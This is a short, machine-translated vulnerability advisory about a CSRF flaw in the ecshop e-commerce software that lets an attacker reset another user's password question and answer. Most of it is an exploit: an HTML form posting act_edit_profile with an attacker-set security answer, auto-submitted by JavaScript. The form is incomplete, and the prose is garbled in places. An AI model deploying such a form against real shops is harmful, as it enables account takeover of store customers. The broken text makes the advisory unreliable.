ecshop modify any user password vulnerability of the CSRF exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201028027
Type myhack58
Reporter 佚名
Modified 2010-10-05T00:00:00


ecshop in the design of the authentication mechanism when there is a problem, resulting in malicious users can steal other user's password, this process can be byxssand csrf to achieve

Vulnerability exp:

<html> <body>

<form action="" method="POST">

<INPUT TYPE="text" NAME="email" value="">

<INPUT TYPE="text" NAME="act" value="act_edit_profile">

<INPUT TYPE="text" NAME="sel_question" value="ecshop">

<INPUT TYPE="text" NAME="passwd_answer" value="exploit">



document. forms[0]. submit();